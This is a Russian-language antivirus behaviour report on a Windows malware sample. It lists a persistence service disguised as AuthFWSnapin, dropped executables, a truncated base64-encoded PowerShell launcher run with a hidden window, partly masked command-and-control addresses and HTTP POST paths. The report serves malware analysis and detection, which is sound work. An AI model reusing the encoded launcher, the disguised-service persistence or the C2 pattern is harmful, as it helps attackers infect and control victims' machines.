Техническая информация
Для обеспечения автозапуска и распространения
Создает следующие сервисы
- [<HKLM>\System\CurrentControlSet\Services\AuthFWSnapin] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\AuthFWSnapin] 'ImagePath' = '"%WINDIR%\SysWOW64\d3d9\AuthFWSnapin.exe"'
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB3AG8AYQByAGMAYQBlAHkAZgB1AHUAbgA9ACcAZgBvAGUAYwBxAHUAaQBzACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAVQBSAEkAdABgAFkAUABgAFIAbwB0AE8AQwBgAG...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\262.exe
Перемещает следующие файлы
- %HOMEPATH%\262.exe в %WINDIR%\syswow64\d3d9\authfwsnapin.exe
Сетевая активность
Подключается к
- '94.##.254.194':80
- '21#.#1.142.238':8080
- '91.##1.166.124':8080
- '16#.#41.92.219':8080
- '79.#8.24.39':8080
- '10#.#17.53.230':443
- '78.##9.165.52':8080
- '11#.#60.130.116':8443
TCP
Запросы HTTP POST
- http://21#.##.142.238:8080/zepIron8tCw/mlJt2ju/oiReifT9sULGs78pp7/x814qTLFr21Z/pcTX/8n1Vj/ via 21#.#1.142.238
- http://16#.##1.92.219:8080/llbP2xWQdAy/baDx0EkRg/bex9zx0yYQIeCfwmExY/MMCOct/ via 16#.#41.92.219
- http://10#.##7.53.230:443/rCaB/4GCE13guzpXK/rewWGCWn2NwztkBRc/2spPcxNGA1qMk/8Ua8N6WSesYqPicE/ via 10#.#17.53.230
- http://11#.###.130.116:8443/CdCjnjeM/ via 11#.#60.130.116
UDP
- DNS ASK ph#####ninjarank.com
Другое
Создает и запускает на исполнение
- '%HOMEPATH%\262.exe'
- '%WINDIR%\syswow64\d3d9\authfwsnapin.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB3AG8AYQByAGMAYQBlAHkAZgB1AHUAbgA9ACcAZgBvAGUAYwBxAHUAaQBzACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAVQBSAEkAdABgAFkAUABgAFIAbwB0AE8AQwBgAG...' (со скрытым окном)
